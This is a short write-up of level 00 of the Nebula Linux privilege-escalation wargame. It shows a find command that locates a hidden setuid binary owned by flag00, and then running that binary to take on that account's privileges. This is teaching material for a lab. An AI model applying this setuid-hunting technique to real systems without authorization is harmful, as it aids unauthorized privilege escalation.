Nebula Level00 Write Up

07 Aug, 2020

Nebula is a wargame from Exploit Exercises about exploiting privilege escalation vulnerabilities on Linux.

This is my write up for the first level.

Overview

This level requires you to find a Set User ID program that will run as the “flag00” account. You could also find this by carefully looking in top level directories in / for suspicious looking directories.

Alternatively, look at the find man page.

To access this level, log in as level00 with the password of level00.

Solution

The level description strongly suggests using the find command to locate the “flag00” binary. So after logging into the server with ssh, I ran:

level00@nebula:~$ find / -iname "flag00" 2> /dev/null
/bin/.../flag00
/home/flag00
/rofs/bin/.../flag00
/rofs/home/flag00
level00@nebula:~$

Let’s break this down:

find - searches the filesystem for all files matching a pattern
/ - start from the top level directory
-iname - the file can be lower or upper case
“flag00” - the file name to search for
2> /dev/null- redirect error messages to/dev/null

Not that we have a list of filenames that contain flag00, let’s examine them.

flag00@nebula:~$ ls -l /bin/.../flag00
rwsr-x--- 1 flag00 level00 7358 2011-11-20 21:22 /bin/.../flag00
flag00@nebula:~$

This file is owned by the flag00 user and is the setuid bit is set! Execute it to raise escalate to flag00.

flag00@nebula:~$ /bin/.../flag00
Congrats, now run getflag to get your flag!
flag00@nebula:~$ getflag
You have successfully executed getflag on a target account
flag00@nebula:~$